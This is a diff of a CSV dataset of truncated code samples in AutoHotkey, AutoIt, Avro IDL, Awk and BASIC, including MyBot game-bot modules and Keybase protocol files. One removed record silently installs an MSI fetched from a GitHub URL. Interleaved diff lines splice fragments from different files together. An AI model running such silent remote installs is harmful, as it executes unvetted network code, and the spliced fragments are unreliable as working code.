A_LoopField = ; 忽略在列表底部的空白。 + continue + FileAppend, `n, d:\Test.txt +}","308","0.9871794871794872","0.0","0.0" +"0812d8988dcb4716cedbb2dfa696b63be3b620bb","DnsQueryTxtRecord.ahk",".ahk","AutoHotkey","; by jNizM https://www.autohotkey.com/boards/viewtopic.php?p=92605&sid=2d7c28698c4dde0d498cfa85f4a86485#p92605 +ResolveHostname(hostname) { + local ; Force-local mode + VarSetCapacity(WSADATA, 394 + (A_PtrSize - 2) + A_PtrSize, 0) + if (DllCall(""ws2_32\WSAStartup"", ""ushort"", 0x0202, ""ptr"", &WSADATA) != 0) + return ""WSAStartup failed"", DllCall(""ws2_32\WSACleanup"") + + VarSetCapacity(hints, 16 + 4 * A_PtrSize, 0) + NumPut(2, hints, 4, ""int"") && NumPut(1, hints, 8, ""int"") && NumPut(6, hints, 12, ""int"") + if (DllCall(""ws2_32\getaddrinfo"", ""astr"", hostname, ""ptr"", 0, ""ptr"", &hints, ""ptr*"", result)) + return ""getaddrinfo failed with error: "" DllCall(""ws2_32\WSAGetLastError""), DllCall(""ws2_32\WSACleanup"") + + addr := result, IPList := [] + while (addr) { + ipaddr := DllCall(""ws2_32\inet_ntoa"", ""uint"", NumGet(NumGet(addr+0, 16 + 2 * A_PtrSize) + 4, 0, ""uint""), ""astr"") + IPList[A_Index] := ipaddr, addr := NumGet(addr+0, 16 + 3 * A_PtrSize) + ","308","0.9871794871794872","0.0","0.0" +"01361bdb2726bbeefda867486d8d4dff1b715666","_Scroller2.ahk",".ahk","AutoHotkey","_() + w := 500, h := 400 + hForm := Form_New(""Resize e3 w500 h400"") + + hToolbar := Form_Add(hForm, ""Toolbar"", """", ""gOnToolbar style=flat il=3"") + hPanel := Form_Add(hForm, ""Panel"", """", ""x5 y50 w"" w-15 "" h"" h-55, ""Attach w h"") + + Loop, 10 + Form_Add(hPanel, ""Edit"", ""Edit "" A_Index, ""vscroll R5"", ""Align T, 100"", ""Attach w"") + + Form_Add(hPanel, ""Text"", ""Footer"", ""center"", ""Align T"", ""Attach w"") + Toolbar_Insert(hToolbar, ""cut`ncopy`npaste`nredo`nundo"") - Switch GUIGetMsg() - Case -3 - ExitLoop - EndSwitch -WEnd + Panel_SetStyle(hPanel, ""scroll"") + Form_Show() +return -_GDIPlus_GraphicsDispose($hGpx) +Form1_Close: + ExitApp +return -_GDIPlus_Shutdown() -_AutoItObject_Shutdown() -","330","1.0543130990415335","0.0","0.0" +#include ..\..\inc +#include _Forms.ahk","308","0.9871794871794872","0.0","0.0" +"1478b4a9b924b86a5b7c1becda6f0273e21f2e57","bigctrl.ahk",".ahk","AutoHotkey","; Copyright (c) 2012 Benjamin Hansen +; +; Permission is hereby granted, free of charge, to any person +; obtaining a copy of this software and associated documentation files +; (the ""Software""), to deal in the Software without restriction, +; including without limitation the rights to use, copy, modify, merge, +; publish, distribute, sublicense, and/or sell copies of the Software, +; and to permit persons to whom the Software is furnished to do so, +; subject to the following conditions: +; +; The above copyright notice and this permission notice shall be +; included in all copies or substantial portions of the Software. +; +; THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, +; EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +; MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND +; NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS +; BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN +; ACTION OF CONTRACT, TORT OR OTHERWISE, ARISI","308","0.9871794871794872","0.0","0.0" +"08cbfdb1b63a8db120fb408bfeb79a7c293a0488","AkelUpdater.ahk",".ahk","AutoHotkey","/* AkelUpdater wrapper +Version: 1.0 +Last time modified: 2015.04.12 18:41 + +Description: a wrapper for AkelUpdater.exe that will checks for new versions of the original AkelUpdater.exe and update it (as AkelUpdater.original.exe) if needed. + +Script author: Drugoy a.k.a. Drugmix +Contacts: idrugoy@gmail.com, drug0y@ya.ru +https://github.com/Drugoy/AkelPad-extras/blob/master/AkelFiles/AkelUpdater.ahk +*/ + +#NoEnv ; Recommended for performance and compatibility with future AutoHotkey releases. +SetWorkingDir, %A_ScriptDir% ; Ensures a consistent starting directory. +#SingleInstance, Force +ListLines, On +; #NoTrayIcon + +isAUOutdated := checkAUFreshness() +If (isAUOutdated) ; There is either an update or file 'AkelUpdater.original.exe' doesn't yet exist. +{ + TrayTip, AkelUpdater, New version detected!`nUpdating it., 3 + WinClose, ahk_exe AkelUpdater.original.exe + getNewAU() + Run, AkelUpdater.original.exe +} + + +getNewAU() +{ + IfNotExist, AkelUpdater + FileCreateDir, AkelUpdater + URLDownloadToFile, % ""http","308","0.9871794871794872","0.0","0.0" +"0fc7c9c13ab47054747f46da10bd98fa6f9fbc51","AndroidKOPLAYER.au3",".au3","AutoIt","; #FUNCTION# ==================================================================================================================== +; Name ..........: OpenKOPLAYER +; Description ...: Opens new KOPLAYER instance +; Syntax ........: +; Parameters ....: None +; Return values .: None +; Author ........: Cosote (04-2016) +; Modified ......: +; Remarks .......: This file is part of MyBot, previously known as ClashGameBot. Copyright 2015-2019 +; MyBot is distributed under the terms of the GNU GPL +; Related .......: +; Link ..........: https://github.com/MyBotRun/MyBot/wiki +; Example .......: No +; =============================================================================================================================== + +Func OpenKOPLAYER($bRestart = False) + + Local $PID, $hTimer, $iCount = 0, $process_killed, $cmdOutput, $connected_to, $cmdPar + + SetLog(""Starting "" & $g_sAndroidEmulator & "" and Clash Of Clans"", $COLOR_GREEN) + + If Not InitAndroid() Then Return + + Local $launchAndroid = ","348","1.12987012987013","0.0","0.0" "0613e52631105319e58d974ef65c2a5fdef07383","File.au3",".au3","AutoIt","#include-once #include ""Array.au3"" @@ -7210,142 +7520,207 @@ _AutoItObject_Shutdown() ; _FileWriteToLine ; _PathFull ; _PathGetRelative -; _PathMake","330","1.0543130990415335","0.0","0.0" -"20c1b7bad7e7917c314228d311e01e83a0ed2017","preInstallAspera.au3",".au3","AutoIt","RunWait(@comspec & ' /c msiexec.exe /i ""https://github.com/jianfengs/sauceLabsPOC/blob/master/AsperaConnect-ML-3.6.6.119698.msi?raw=true"" /quiet') - -Sleep(2000) - -Run(@comspec & ' /c C:\Users\selenium\AppData\Local\Programs\Aspera\Aspera Connect\bin\asperaconnect.exe') -","330","1.0543130990415335","0.0","0.0" -"214507c29762043c40c87ccfbeaf09d34d0db1d8","Test1.au3",".au3","AutoIt","#cs -Global $mapa[][] = [[1, 0, 1, 0, 1, 0, 0], _ - [0, 1, 0, 0, 0, 1, 0], _ - [0, 0, 0, 1, 0, 1, 0], _ - [1, 0, 1, 0, 1, 0, 0], _ - [1, 0, 0, 0, 0, 1, 0], _ - [0, 1, 0, 1, 0, 0, 1], _ - [0, 0, 1, 0, 1, 0, 0]] -#ce -#cs -Global $mapa[][] = [[1, 0, 1, 0, 1, 0, 0], _ - [0, 1, 0, 0, 0, 1, 0], _ - [0, 0, 0, 1, 0, 1, 0], _ - [1, 0, 1, 0, 1, 0, 0], _ - [1, 0, 0, 0, 0, 1, 0], _ - [0, 1, 0, 1, 0, 0, 1], _ - [0, 0, 1, 0, 1, 1, 0]] -#ce -;#cs -Global $mapa[][] = [[1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1], _ - [0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0], _ - [0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0], _ - [1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1], _ - [1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1], _ - [0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 0], _ - [0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0, 0], _ - [1, 0, 1, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1], _ - [0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 0, 0], _ - [0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 0, 1, 0, 0], _","330","1.0543130990415335","0.0","0.0" -"1d9afa15c07d5fccea92d2804ae3c7f96c4e42b3","_GUICtrlToolbar_HitTest.au3",".au3","AutoIt","#include -#include -#include - -Global $g_idMemo - -Example() - -Func Example() - Local $hGUI, $hToolbar, $aRect, $iHit, $aStrings[4] - Local Enum $e_idNew = 1000, $e_idOpen, $e_idSave, $idHelp - - ; Create GUI - $hGUI = GUICreate(""Toolbar"", 400, 300) - $hToolbar = _GUICtrlToolbar_Create($hGUI) - $g_idMemo = GUICtrlCreateEdit("""", 2, 36, 396, 262, $WS_VSCROLL) - GUICtrlSetFont($g_idMemo, 10, 400, 0, ""Courier New"") - GUISetState(@SW_SHOW) - - ; Add standard system bitmaps - Switch _GUICtrlToolbar_GetBitmapFlags($hToolbar) - Case 0 - _GUICtrlToolbar_AddBitmap($hToolbar, 1, -1, $IDB_STD_SMALL_COLOR) - Case 2 - _GUICtrlToolbar_AddBitmap($hToolbar, 1, -1, $IDB_STD_LARGE_COLOR) - EndSwitch - - ; Add strings - $aStrings[0] = _GUICtrlToolbar_AddString($hToolbar, ""&New Button"") - $aStrings[1] = _GUICtrlToolbar_AddString($hToolbar, ""&Open Button"") - $aStrings[2] = _GUICtrlToolbar_AddString($hToolbar, ""&Save Button"") - $aStrings[3]","330","1.0543130990415335","0.0","0.0" -"11354dccbdd124454bd28c72353d9c59eaf9080d","Persistence_v2.0.avdl",".avdl","Avro IDL","/* - * Copyright (C) 2013-2015 Uncharted Software Inc. - * - * Property of Uncharted(TM), formerly Oculus Info Inc. - * http://uncharted.software/ - * - * Released under the MIT License. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy of - * this software and associated documentation files (the ""Software""), to deal in - * the Software without restriction, including without limitation the rights to - * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies - * of the Software, and to permit persons to whom the Software is furnished to do - * so, subject to the following conditions: - * - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. - * - * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEM","18","1.3846153846153846","0.0","0.0" -"0212427cc85a2dcadb9712706258162161db4db9","notify.avdl",".avdl","Avro IDL","@namespace(""chat.1"") +; _PathMake","348","1.12987012987013","0.0","0.0" +"061e380c5085b0604056589190d9bb70503ca111","TrainSystem.au3",".au3","AutoIt","; #FUNCTION# ==================================================================================================================== +; Name ..........: Train Revamp Oct 2016 +; Description ...: +; Syntax ........: +; Parameters ....: None +; Return values .: None +; Author ........: Mr.Viper(10-2016), ProMac(10-2016), CodeSlinger69 (01-2018) +; Modified ......: ProMac (11-2016), Boju (11-2016), MR.ViPER (12-2016), CodeSlinger69 (01-2018) +; Remarks .......: This file is part of MyBot, previously known as ClashGameBot. Copyright 2015-2019 +; MyBot is distributed under the terms of the GNU GPL +; Related .......: +; Link ..........: https://github.com/MyBotRun/MyBot/wiki +; Example .......: No +; =============================================================================================================================== +#include-once +#include +#include + +Func TrainSystem() + If Not $g_bTrainEnabled Then ; check for training disabled in halt mode + If $g","348","1.12987012987013","0.0","0.0" +"0dfcb03293fbb9a6148ff2c6252dabaf634ded41","_Excel_RangeWrite.au3",".au3","AutoIt","#AutoIt3Wrapper_AU3Check_Stop_OnWarning=Y +#AutoIt3Wrapper_AU3Check_Parameters=-d -w 1 -w 2 -w 3 -w 4 -w 5 -w 6 + +#include +#include +#include + +; Create application object and create a new workbook +Global $oAppl = _Excel_Open() +If @error <> 0 Then Exit MsgBox($MB_SYSTEMMODAL, ""Excel UDF: _Excel_RangeWrite Example"", ""Error creating the Excel application object."" & @CRLF & ""@error = "" & @error & "", @extended = "" & @extended) +Global $oWorkbook = _Excel_BookNew($oAppl) +If @error <> 0 Then + MsgBox($MB_SYSTEMMODAL, ""Excel UDF: _Excel_RangeWrite Example"", ""Error creating the new workbook."" & @CRLF & ""@error = "" & @error & "", @extended = "" & @extended) + _Excel_Close($oAppl) + Exit +EndIf + +Example1($oWorkbook) +Example2($oWorkbook) +Example3($oWorkbook) +Example4($oWorkbook) + +Exit + +; ***************************************************************************** +; Example 1 +; Write a string with a line break to the active sheet in the active workbook +; *****","348","1.12987012987013","0.0","0.0" +"0de47799ec0d7ea03a723a5d62c794c0ed450e10","readConfig.au3",".au3","AutoIt","; #FUNCTION# ==================================================================================================================== +; Name ..........: readConfig.au3 +; Description ...: Reads config file and sets variables +; Syntax ........: readConfig() +; Parameters ....: NA +; Return values .: NA +; Author ........: +; Modified ......: +; Remarks .......: This file is part of MyBot, previously known as ClashGameBot. Copyright 2015-2016 +; MyBot is distributed under the terms of the GNU GPL +; Related .......: +; Link ..........: https://github.com/MyBotRun/MyBot/wiki +; Example .......: No +; =============================================================================================================================== + +Func readConfig() ;Reads config and sets it to the variables + If FileExists($building) Then + $TownHallPos[0] = IniRead($building, ""other"", ""xTownHall"", ""-1"") + $TownHallPos[1] = IniRead($building, ""other"", ""yTownHall"", ""-1"") + $iTownHallLevel = IniRead($building,","348","1.12987012987013","0.0","0.0" +"091227738dc45ce43eb3e0ab60ac2716a3ebef0e","CommonDataTypes_v4.1.avdl",".avdl","Avro IDL","/** + * With credits to Oculus Info Inc for the influence of this document. Released + * under the MIT License. + * + * Permission is hereby granted, free of charge, to any person obtaining a copy + * of this software and associated documentation files (the ""Software""), to deal + * in the Software without restriction, including without limitation the rights + * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell + * copies of the Software, and to permit persons to whom the Software is + * furnished to do so, subject to the following conditions: + * + * The above copyright notice and this permission notice shall be included in + * all copies or substantial portions of the Software. + * + * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR + * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE + * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMA","14","1.5555555555555556","0.0","0.0" +"0ca3b2dc9f0082ee513e97c11446098d7f9eae30","block.avdl",".avdl","Avro IDL","@namespace(""keybase.1"") + +protocol block { + import idl ""backend_common.avdl""; + + record GetBlockRes { + string blockKey; + bytes buf; + } + + // Fixed-size nonce to identify a reference to a block + fixed BlockRefNonce(8); -protocol NotifyChat { + record BlockReference { + BlockIdCombo bid; + BlockRefNonce nonce; + UserOrTeamID chargedTo; + } - import idl ""github.com/keybase/client/go/protocol/keybase1"" as keybase1; + record BlockReferenceCount{ + BlockReference ref; + int liveCount; + } - enum ChatActivitySource { - LOCAL_0, - REMOTE_1 + record DowngradeReferenceRes{ + array completed; + BlockReference failed; } - enum ChatActivityType { - RESERVED_0, - INCOMING_MESSAGE_1, - READ_MESSAGE_2, - NEW_CONVERSATION_3, - SET_STATUS_4, - FAILED_MESSAGE_5, - MEMBERS_UPDATE_6, - SET_APP_NOTIFICATION_SETTINGS_7, - TEAMTYPE_8, - EXPUNGE_9, - EPHEMERAL_PURGE_10, - REACTION_UPDATE_11, - MESSAGES_UPDATED_12 + record BlockPingResponse { + // In the future, we might want to respond with timestamps or + // ping intervals. } - record IncomingMessage { - UIMessage message; - union { null, UIMessage } modifiedMessage; - ConversationID convID; - boolean displayDesktopNotification; - string desktopNotificationSnippet; - union { null, InboxUIItem } conv; - union { null, UIPagination } pagination; + + ChallengeInfo getSessionChallenge(); + void authenticateSession(string signature); + + void putBlock(BlockIdCombo bid, string folder, string blockKey, bytes buf); + void putBlockAgain(string folder, BlockReference ref, string blockKey, bytes buf); + GetBlockRes getBlock(BlockIdCombo bid, string folder); + + void addReference(string folder, BlockReference re","14","1.5555555555555556","0.0","0.0" +"06deaa09eca05f0c164a9cf05f5b5184b22b97fb","simple_fs.avdl",".avdl","Avro IDL","@namespace(""keybase.1"") + +protocol SimpleFS { + + import idl ""common.avdl""; + import idl ""kbfs_common.avdl""; + +/* + File manipulation interface + + Caller provides OpID to one of these methods to begin an operation: + simpleFSList + simpleFSListRecursive + simpleFSListRecursiveToDepth + simpleFSCopy + simpleFSOpen + simpleFSMove + simpleFSRemove + simpleFSGetRevisions + then calls one of the following until status is no longer pending + or operation is cancelled: + simpleFSReadList (after list, listRecursive, or listRecursiveToDepth) + simpleFSGetRevisions (after getRevisions) + simpleFSRead (after open) + simpleFSWrite (after open) + simpleFSCheck (after copy, move or remove) + Caller can optionally block by calling wait() + Operation must be closed by calling close +*/ + + // Random GUID provided by caller + fixed OpID(16); + + @typedef(""int64"") @lint(""ignore"") record KBFSRevision {} + + enum KBFSArchivedType { + REVISION_0, + TIME_1, + TIME_STRING_2, + R","14","1.5555555555555556","0.0","0.0" +"086e1037f07357ba92ba6633205f00aeca08fd67","notify_badges.avdl",".avdl","Avro IDL","@namespace(""keybase.1"") +protocol NotifyBadges { + import idl ""common.avdl""; + + @typedef(""bytes"") record ChatConversationID {} + + record BadgeState { + @lint(""ignore"") + int newTlfs; + int rekeysNeeded; + int newFollowers; + int inboxVers; + + array conversations; + array newGitRepoGlobalUniqueIDs; + array newTeamIDs; + array newTeamAccessRequests; } - record ReadMessageInfo { - ConversationID convID; - MessageID msgID; - union { null, InboxUIItem } conv; + record BadgeConversationInfo { + ChatConversationID convID; + map badgeCounts; + int unreadMessages; } - record NewConversationInfo { - ConversationID convID; - union { null, InboxUIItem } conv","18","1.3846153846153846","0.0","0.0" -"212216260d4ef43ad34a41a79a84d224ae29a585","ClusteringDataAccess_v2.0.avdl",".avdl","Avro IDL","/* + @notify("""") + void badgeState(BadgeState badgeState); +} +","14","1.5555555555555556","0.0","0.0" +"11354dccbdd124454bd28c72353d9c59eaf9080d","Persistence_v2.0.avdl",".avdl","Avro IDL","/* * Copyright (C) 2013-2015 Uncharted Software Inc. * * Property of Uncharted(TM), formerly Oculus Info Inc. @@ -7365,260 +7740,354 @@ protocol NotifyChat { * * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEM","18","1.3846153846153846","0.0","0.0" -"068c1a3b22077365c316ebc165bed545f2d96652","Search_v1.8.avdl",".avdl","Avro IDL","/** - * Copyright (c) 2013 Oculus Info Inc. - * http://www.oculusinfo.com/ - * - * Released under the MIT License. - * - * Permission is hereby granted, free of charge, to any person obtaining a copy of - * this software and associated documentation files (the ""Software""), to deal in - * the Software without restriction, including without limitation the rights to - * use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies - * of the Software, and to permit persons to whom the Software is furnished to do - * so, subject to the following conditions: + * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEM","14","1.5555555555555556","0.0","0.0" +"01cd116f44cad6ad0c29732a144b04e0d9afd5e8","extexi","","Awk","# Extract all examples from the manual source. -*- AWK -*- - * The above copyright notice and this permission notice shall be included in all - * copies or substantial portions of the Software. +# This file is part of GNU Bison +# Copyright 1992, 2000, 2001, 2005 Free Software Foundation, Inc. +# +# This program is free software; you can redistribute it and/or modify +# it under the terms of the GNU General Public License as published by +# the Free Software Foundation; either version 2 of the License, or +# (at your option) any later version. +# +# This program is distributed in the hope that it will be useful, +# but WITHOUT ANY WARRANTY; without even the implied warranty of +# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +# GNU General Public License for more details. +# +# You should have received a copy of the GNU General Public License +# along with this program; if not, write to the Free Software +# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA +# 02111-1307 USA - * THE SOFTWARE IS PROVIDED ""AS IS"", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR - * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, - * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE - * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES","18","1.3846153846153846","0.0","0.0" -"177daaf4f2276a056969af7abaaa3f2cbfb69f09","datablock.avdl",".avdl","Avro IDL","@namespace(""it.crs4.features"") -protocol DataBlock { +# This script is for use with any Awk that conforms to POSIX. +# It was derived from a similar script tests/generate.awk in GNU","12","0.056074766355140186","0.0","0.0" +"0d2e74e28b9a3f13642ad29711702c0011ce2f69","awkexample","","Awk","#! /usr/bin/awk -f +#Note : on Solaris, use nawk instead - /** Element data type */ - enum DType { - INT8, UINT8, INT16, UINT16, INT32, UINT32, FLOAT32, FLOAT64 - } +BEGIN { + for (i = 0; i < ARGC; i++) + printf ""ARGV[%d] = %s\n"", i, ARGV[i] + exit +} +","12","0.056074766355140186","0.0","0.0" +"018bff001fef0ae54556d9082547987e8f6ad0f3","s87tbase","","Awk","#!/usr/bin/gawk -f +BEGIN{ +# TBASE=""/usr/local/share/bathy/tbase/tbase.grd"" + TBASE=ENVIRON[""TBASE""]; + + if (TBASE==""""){ + print ""export TBASE="" + exit 1 + } - record ArraySlice { - DType dtype; - boolean little_endian = true; - array shape; - array offsets; - array deltas; - bytes data; - } + HOST=ENVIRON[""HOST""]; -} + bathy="""" + } -// Local Variables: -// mode: java -// End: -","18","1.3846153846153846","0.0","0.0" -"17addd4e3b3986c0b5a6fd1ec51296e220e50999","accents.awk",".awk","Awk","{ - orig = $0; - gsub(/À/, ""A"", $0); - gsub(/Á/, ""A"", $0); - gsub(/Å/, ""A"", $0); - gsub(/Æ/, ""AE"", $0); - gsub(/Ç/, ""C"", $0); - gsub(/È/, ""E"", $0); - gsub(/É/, ""E"", $0); - gsub(/Ê/, ""E"", $0); - gsub(/Ë/, ""E"", $0); - gsub(/Ì/, ""I"", $0); - gsub(/Í/, ""I"", $0); - gsub(/Î/, ""I"", $0); - gsub(/Ï/, ""I"", $0); - gsub(/Ð/, ""D"", $0); - gsub(/Ñ/, ""N"", $0); - gsub(/Ò/, ""O"", $0); - gsub(/Ó/, ""O"", $0); - gsub(/Ô/, ""O"", $0); - gsub(/Õ/, ""O"", $0); - gsub(/Ö/, ""O"", $0); - gsub(/Ø/, ""O"", $0); - gsub(/Ù/, ""U"", $0); - gsub(/Ú/, ""U"", $0); - gsub(/Û/, ""U"", $0); - gsub(/Ü/, ""U"", $0); - gsub(/Ý/, ""Y"", $0); - gsub(/Þ/, ""B"", $0); - gsub(/ß/, ""b"", $0); - gsub(/à/, ""a"", $0); - gsub(/á/, ""a"", $0); - gsub(/â/, ""a"", $0); - gsub(/ã/, ""a"", $0); - gsub(/ä/, ""a"", $0); - gsub(/å/, ""a"", $0); - gsub(/æ/, ""ae"", $0); - gsub(/ç/, ""c"", $0); - gsub(/è/, ""e"", $0); - gsub(/é/, ""e"", $0); - gsub(/ê/, ""e"", $0); - gsub(/ë/, ""e"", $0); - gsub(/ì/, ""i"", $0); - gsub(/í/, ""i"", $0); - gsub(/î/, ""i"", $0); - gsub(/ï/, ""i"", $0); - gsub(/ð/, ""o"", $0); - gsub(/ñ/, ""n"", $0); - gsub(/ò/, ""o"", $0","187","0.8820754716981132","0.0","0.0" -"1d0977a85ac44684bbc8707a52525ce22b55ccaa","checkoutput.awk",".awk","Awk","# Sanitize the output of Online Rollback for a clean reference file -/RLBKJNSEQ/ { - if (resyncseqnolist >= rollseqno && jnlseqno >= rollseqno) { - if ($(NF-1)>rollseqno) { - print ""TEST-E-FAIL : RESYNC Seqno does not match RLBKJNSEQNO"" - } - } else { - if ("""" != debug) {print ""TEST-I-INFO : RESYNC Seqno is less than rollseqno""} +NR==1{ lat=$4; lon=$5 ; comm=""echo "" lon "" "" lat "" | grdtrack -Z -G"" TBASE + comm | getline TZ + TZ=-TZ; } +/^[^#].*ZZ/{bathy=""#""} +/^@/{ print ""# "" strftime(""%Y/%m/%d %H:%M: "") ""Bathymetry from "" HOST "":"" TBASE "" ="" TZ ; + print bathy ""&ZZ="" TZ + } +{print} +","12","0.056074766355140186","0.0","0.0" +"18ac8b878b081f1846069d2aa2f7eecc3f00f926","file-format","","Awk","#! /usr/bin/awk -f +# file-format (AWK script) -- Reports line ending type for a group of files +# +# Note: in awk, it is impossible to tell if the last line doesn't have an LF + +# Shows the info for a the file that was just processed +function show_info() +{ + printf(""%s:\tlines: %d, CRs: %d, format: %s\n"", + prev_filename, prev_nr, cr_count, + cr_count == 0 ? ""Unix"" : (prev_nr != cr_count ? ""MISMATCH"" : ""dos"") ); } -/(GTM-E-|JNLSUCCESS|ORLBKCMPLT)/{ - print $0 -} -","187","0.8820754716981132","0.0","0.0" -"1c612fce350da6df03be44469a413b35dc0113e9","splitPath.awk",".awk","Awk","BEGIN{ + + +# *** MAINLINE *** +# Initialise at the start of each new file +FNR == 1 { + if (prev_filename != """") + { + show_info(); + } + + cr_count = 0; + # Track the filename ready for use at END or when a file change occurs + prev_filename = FILENAME; + } + +/\r$/ { ++cr_count; } +{ prev_nr = FNR; } + +END { + show_info(); + } +","12","0.056074766355140186","0.0","0.0" +"03cd6337f583ff64c1c868d31f59326962e2382f","awkdiff","","Awk","#!/usr/bin/awk -f +# +# $FreeBSD: releng/11.0/tools/tools/perforce/awkdiff 270727 2014-08-27 18:56:12Z jmg $ +# + +BEGIN { + #parentpath = ""//depot/vendor/freebsd/src/sys/"" + #childpath = ""//depot/projects/opencrypto/"" +} +$1 == ""===="" { + last_line = $0 + last_filename = $2 + #gsub(parentpath, """", last_filename) + gsub(/#[0-9]*$/, """", last_filename) + did_sub = 0 +} +$1 == ""===="" && $2 == """" { + new_file = $4 + gsub(childpath, """", new_file) + gsub(/#[0-9]*$/, """", new_file) + cmd = ""p4 print \"""" $4 ""\"" | sed '/^\\/\\/depot/d' | diff -u /dev/null /dev/stdin | sed s@/dev/stdin@"" new_file ""@"" + #print ""x"" cmd ""x"" + system(cmd) +} +$1 == ""===="" && $4 == """" { + del_file = $2 + gsub(parentpath, """", del_file) + gsub(/#[0-9]*$/, """", del_file) + cmd = ""p4 print \"""" $2 ""\"" | sed '/^\\/\\/depot/d' | diff -u /dev/stdin /dev/null | sed s@/dev/stdin@"" del_file ""@"" + #print ""x"" cmd ""x"" + system(cmd) +} +$1 != ""===="" { + if (!did_sub && (($1 == ""***************"") || ($1 == ""@@""))) { + print ""--- "", last_filename "".orig"" + ","12","0.056074766355140186","0.0","0.0" +"121250fd9f2b837fa7cb7c303be7fe4af1520108","merge.awk",".awk","Awk","# @(#)merge.awk 8.3 (Berkeley) 5/25/94 +# +# merge index entries into one line per label +$1 == prev { + printf "", %s"", $2; + next; +} +{ + if (NR != 1) + printf ""\n""; + printf ""%s \t%s"", $1, $2; + prev = $1; +} +END { + printf ""\n"" +} +","185","0.8644859813084113","0.0","0.0" +"062f4caf11ec33dbed52314ec169bd1769b37bb0","pm3_cmd_h2lua.awk",".awk","Awk","BEGIN { + print ""--[["" + print ""These are Proxmark command definitions."" + print ""This file is automatically generated from pm3_cmd.h - DON'T EDIT MANUALLY."" + print ""--]]"" + print ""local __commands = {"" +} + +#$1 ~ /#define/ && $2 ~ /^CMD_([[:alnum:]_])+/ { print $2, ""="", $3, "","" } +$1 ~ /#define/ && $2 ~ /^CMD_[A-Za-z0-9_]+/ { sub(/\r/, """"); print $2, ""="", $3 "","" } + +END { + print ""}"" + print ""return __commands"" +} +","185","0.8644859813084113","0.0","0.0" +"0dc4fed070b4a0c2498bd3c3c0b298f7a1163d3b","transpose.awk",".awk","Awk","BEGIN {FS="" ""} + +{ + for (i=1;i<=NF;i++) + { + arr[NR,i]=$i; + if(big <= NF) + big=NF; + } } -{ - len=split($1,rows,"":""); - for(i=1;i - print -1 - case /he/: - print 2 - print 2 - default: - print 4 - print 4 - } -}","187","0.8820754716981132","0.0","0.0" -"1c673f3293f5cd4f913429850aa4546e0619b1aa","direditor.bas",".bas","BASIC"," 10 rem directory editor - 20 rem bumbershoot software, 2016-7 - 30 dim sn%(17),de$(143),d%(17) - 31 rem sn%=sector number for each blk - 32 rem de$=directory entries - 33 rem d%=dirty bits - 34 rem ns=number of dir sectors - 35 rem dv=target drive (set below) - 36 rem eu/es=ever (un)scratched - 40 gosub 1000:rem init drive - 50 gosub 2000:rem main program - 60 gosub 3000:rem write changes - 70 end - 100 rem list files - 110 for i=1 to ns*8 - 120 print i;""{left}. "";mid$(de$(i-1),4,16) - 130 next i - 140 return - 200 rem exchange entries i1 and i2 - 210 t$=de$(i1-1):de$(i1-1)=de$(i2-1):de$(i2-1)=t$ - 220 d%(int((i1-1)/8))=1:d%(int((i2-1)/8))=1 - 230 return - 1000 rem select and read drive - 1010 input ""which drive (8-11)"";a$:dv=val(a$):if dv<8 or dv>11 then 1010 - 1020 open 15,dv,15,""i0"":input#15,ec,em$,ft,fs - 1030 if ec<>0 then print ""error code"";ec;""on track"";ft;""sector"";fs:print em$ - 1040 if ec<>0 then close 15:goto 1010 - 1050 gosub 1100:rem read directory - 1060 close 15:e","177","0.9888268156424581","0.0","0.0" -"02295c6716bc6518d690bfb0fae53058ce69c0af","FindMatchEntryForm.bas",".bas","BASIC","Version =20 -VersionRequired =20 -Begin Form - DividingLines = NotDefault - AllowDesignChanges = NotDefault - DefaultView =0 - PictureAlignment =2 - DatasheetGridlinesBehavior =3 - GridX =24 - GridY =24 - Width =6000 - DatasheetFontHeight =11 - ItemSuffix =7 - Right =13515 - Bottom =7605 - 